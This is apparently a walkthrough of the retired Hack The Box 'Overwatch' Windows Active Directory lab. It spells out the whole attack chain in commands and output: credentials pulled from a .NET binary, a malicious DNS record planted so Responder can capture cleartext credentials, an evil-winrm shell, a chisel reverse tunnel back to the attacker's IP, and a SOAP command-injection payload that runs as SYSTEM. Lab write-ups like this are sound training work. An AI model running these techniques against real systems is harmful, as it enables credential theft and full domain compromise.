Hack The Box
Hack The Box: Overwatch Walkthrough
An archived walkthrough of the retired Hack The Box Overwatch machine, preserved from Abdullah Kareem's OSWE Prep preparation notes.

OS: Windows Server 2022 (Active Directory) Difficulty: Hard IP: 10.129.30.5 My IP: 10.10.16.155 Flags:
- user.txt:
6f70b[redacted]379614ba8 - root.txt:
5a500[redacted]bb4c8e0ee
🗺️ Cyber Kill Chain Mapping
| Phase | Action |
|---|---|
| Reconnaissance | Nmap scan, SMB enumeration |
| Weaponization | Extract creds from binary, craft SOAP XML payload |
| Delivery | MSSQL linked server trigger, SOAP HTTP request |
| Exploitation | DNS poisoning → cleartext cred capture, WCF KillProcess injection |
| Installation | Chisel tunnel, evil-winrm shell |
| C2 | evil-winrm session as sqlmgmt |
| Actions on Objective | Read user.txt, inject via WCF → read root.txt as SYSTEM |
Phase 1 — Reconnaissance
Nmap Scan
nmap -sV -sC -p- --min-rate 5000 10.129.30.5
Key open ports:
| Port | Service | Why it matters |
|---|---|---|
| 53 | DNS | AD DNS — can be poisoned |
| 88 | Kerberos | It's a Domain Controller |
| 445 | SMB | File shares, lateral movement |
| 3389 | RDP | Remote desktop |
| 5985 | WinRM | Remote shell (evil-winrm) |
| 6520 | MSSQL | SQL Server on non-standard port |
Why this matters: Seeing Kerberos (88), LDAP (389), and DNS (53) together tells you immediately this is a Domain Controller. MSSQL on a non-standard port (6520 instead of 1433) is unusual — worth investigating.
Phase 2 — SMB Enumeration
List shares
smbclient -L //10.129.30.5 -N
Found: software$ share — accessible anonymously (no password required).
Why this matters:
$shares are usually hidden admin shares. An accessible one with no auth is REDACTED misconfiguration. Always check SMB null sessions on Windows boxes.
Browse and grab files
smbclient //10.129.30.5/software$ -N
smb: \> cd Monitoring
smb: \Monitoring\> get overwatch.exe
smb: \Monitoring\> get overwatch.exe.config
What we got:
overwatch.exe— a .NET monitoring application (WCF service)overwatch.exe.config— XML config revealing the WCF endpoint:http://overwatch.htb:8000/MonitorService
Why this matters: Developers often leave compiled binaries on shares. .NET binaries are not obfuscated by default — they are trivially reversible and often contain hardcoded secrets.
Phase 3 — Extract Credentials from Binary
.NET strings are stored in UTF-16 Little Endian format, not ASCII. The strings command without flags won't find them.
strings -el overwatch.exe | grep -iE "password|sqlsvc|Server="
Result:
Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=REDACTED;
Why
-el? The-e lflag tellsstringsto look for 16-bit little-endian characters — exactly how .NET embeds string literals in compiled IL bytecode.
Key Takeaway: Never hardcode credentials in source code or compiled binaries.
strings -elis the fastest way to extract secrets from .NET assemblies without installing anything.
Credentials found: sqlsvc : TI0LKcfHzZw1Vv
Phase 4 — MSSQL Login & Linked Server Discovery
Connect to MSSQL
impacket-mssqlclient 'overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv@10.129.30.5' \
-port 6520 -windows-auth
Why
-windows-auth? The credential is REDACTED domain account (OVERWATCH\sqlsvc), not a SQL local login. Windows Authentication uses Kerberos/NTLM, not SQL's built-in auth.
Check privileges
SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');
-- Result: sqlsvc, 0 (guest-level, NOT sysadmin — no xp_cmdshell)
Enumerate linked servers
EXEC sp_linkedservers;
-- or
SELECT name, data_source FROM sys.servers;
Result:
S200401\SQLEXPRESS (local)
SQL07 (linked — another SQL Server)
Why this matters: SQL Server Linked Servers allow one SQL instance to query another. When you run a query against a linked server, the local server authenticates to the remote one — often using a service account with a stored plaintext password. This is the attack surface.
Phase 5 — DNS Poisoning + Responder = Cleartext Password Capture
This is the most interesting part. Here's the logic:
SQL07is a linked server — the name resolves via Active Directory DNSsqlsvcis in the DnsAdmins group (has permission to add DNS records)- We add a fake DNS A record for
sql07→ pointing to our Kali IP - We start Responder to listen for MSSQL authentication on our IP
- We trigger the linked server → the DC tries to auth to "SQL07" (our machine) → Responder captures the cleartext password of whatever account the linked server uses to authenticate
Step 1: Add malicious DNS record
git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx
python3 dnstool.py \
-u 'OVERWATCH\sqlsvc' -p 'TI0LKcfHzZw1Vv' \
-r sql07 -a add -t A -d 10.10.16.155 \
10.129.30.5
Verify it was added:
python3 dnstool.py \
-u 'OVERWATCH\sqlsvc' -p 'TI0LKcfHzZw1Vv' \
-r sql07 -a query \
10.129.30.5
# Should show: Address 10.10.16.155
Step 2: Start Responder
sudo responder -I tun0 -w
What is Responder? It impersonates network services (MSSQL, SMB, HTTP, etc.) and captures credentials when clients try to authenticate. Since MSSQL linked servers can use cleartext auth, the password comes in unencrypted.
Step 3: Trigger the linked server query
In your MSSQL session:
SELECT * FROM OPENQUERY(SQL07, 'SELECT 1');
Result in Responder
[MSSQL] Cleartext Client : 10.129.30.5
[MSSQL] Cleartext Hostname : SQL07
[MSSQL] Cleartext Username : sqlmgmt
[MSSQL] Cleartext Password : null
Key Takeaway: Linked servers that use cleartext MSSQL authentication are a critical misconfiguration. Combined with DnsAdmins group membership allowing DNS record manipulation, this is a devastating credential capture chain.
New credentials: sqlmgmt : bIhBbzMMnB82yx
Phase 6 — WinRM Shell → user.txt
evil-winrm -i 10.129.30.5 -u sqlmgmt -p REDACTED
type C:\Users\sqlmgmt\Desktop\user.txt
# 6f70b[redacted]379614ba8
Why does this work? Port 5985 (WinRM) was open and
sqlmgmtis a domain user with WinRM access.evil-winrmis a Ruby-based WinRM client that gives a full interactive shell.
Phase 7 — Chisel Tunnel (Expose Internal Port 8000)
The WCF monitoring service (overwatch.exe) runs on localhost:8000 — not exposed externally. We need to tunnel it through our evil-winrm session.
On Kali — start chisel server
# Find chisel (pre-installed on Kali)
which chisel || apt install chisel -y
chisel server -p 9001 --reverse
In evil-winrm — upload and run chisel client
upload /usr/bin/chisel C:\Windows\Temp\chisel.exe
C:\Windows\Temp\chisel.exe client 10.10.16.155:9001 R:8000:127.0.0.1:8000
How chisel works: The target connects outbound to our server on port 9001 (
--reverse). It then creates a tunnel so that our port 8000 on Kali forwards into the target'slocalhost:8000. This bypasses firewall rules that block inbound connections.
Add DNS to /etc/hosts on Kali
sudo sh -c 'echo "127.0.0.1 overwatch.htb" >> /etc/hosts'
Verify the tunnel works
curl -s http://overwatch.htb:8000/MonitorService | head -3
# Should return HTML/XML — WCF service page visible
Phase 8 — WCF KillProcess Command Injection → root.txt
Understanding the vulnerability
The overwatch.exe.config revealed the WCF service exposes three operations:
StartMonitoringStopMonitoringKillProcess← vulnerable
KillProcess takes a processName string and passes it unsanitized to Stop-Process or a cmd.exe call on the server. This is a classic command injection — the semicolon ; separates commands in PowerShell.
The service runs as NT AUTHORITY\SYSTEM (no reason to drop privileges for a monitoring service), so any injected command runs as SYSTEM.
Craft the SOAP payload
cat > /tmp/kill.xml << 'EOF'
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<KillProcess xmlns="http://tempuri.org/">
<processName>notepad; type C:\Users\Administrator\Desktop\root.txt</processName>
</KillProcess>
</soap:Body>
</soap:Envelope>
EOF
Why
notepad;? We need a valid process name first to avoid an early error before our injection runs.notepadis a safe dummy — even if it's not running, the service continues and executes what follows the;.
Send the SOAP request
curl -s \
-H "Content-Type: text/xml; charset=utf-8" \
-H "SOAPAction: http://tempuri.org/IMonitoringService/KillProcess" \
--data @/tmp/kill.xml \
http://overwatch.htb:8000/MonitorService
Response
<KillProcessResponse xmlns="http://tempuri.org/">
<KillProcessResult>[redacted retired-lab hash or flag]</KillProcessResult>
</KillProcessResponse>
root.txt: 5a5001[redacted]bb4c8e0ee
Key Takeaway:

in XML is just a carriage return\r— not part of the flag. WCF services withincludeExceptionDetailInFaults="True"and no authentication are trivially exploitable — the WSDL/MEX endpoint advertises every available method to anyone.
Credential Chain
[Anonymous SMB]
↓
overwatch.exe (strings -el)
↓
sqlsvc : TI0LKcfHzZw1Vv
↓
MSSQL port 6520 → Linked Server SQL07
↓
DNS poison (dnstool) + Responder
↓
sqlmgmt : bIhBbzMMnB82yx
↓
evil-winrm → user.txt
↓
chisel tunnel → WCF port 8000
↓
SOAP KillProcess injection (SYSTEM)
↓
root.txt
Key Takeaways
strings -elfor .NET binaries — always run this before installing any decompiler. UTF-16 LE strings are invisible to plainstrings.SMB null sessions — anonymous read access to a non-default share is always worth exploring. Developers leave binaries with hardcoded secrets in "internal" shares.
MSSQL Linked Servers = credential theft surface — when a linked server uses cleartext MSSQL auth, poisoning the DNS record for the linked server name forces the authentication to your machine.
DnsAdmins = underrated privilege — members can add arbitrary DNS records to AD DNS. This alone enables the entire Phase 5 attack.
WCF services with no auth +
KillProcess— any service that executes OS commands based on user-supplied input without sanitization is RCE. Running such a service as SYSTEM makes it an instant root.Chisel reverse tunnels — when a port is only listening on localhost internally, reverse port forwarding via an existing shell (evil-winrm) exposes it without firewall issues.
No reverse shell needed — the WCF response body returned the flag directly. Always check if the service echoes output before going through the effort of a full reverse shell.
Tools Used
| Tool | Purpose |
|---|---|
nmap |
Port/service enumeration |
smbclient |
SMB share browsing and file download |
strings -el |
UTF-16 string extraction from .NET binary |
impacket-mssqlclient |
MSSQL authentication and querying |
krbrelayx/dnstool.py |
Active Directory DNS record manipulation |
responder |
Cleartext credential capture |
evil-winrm |
WinRM interactive shell |
chisel |
Reverse port forwarding tunnel |
curl |
Manual SOAP request sending |
Tags
#htb #windows #activedirectory #mssql #wcf #dnspoisoning #commandinjection #chisel #responder #hard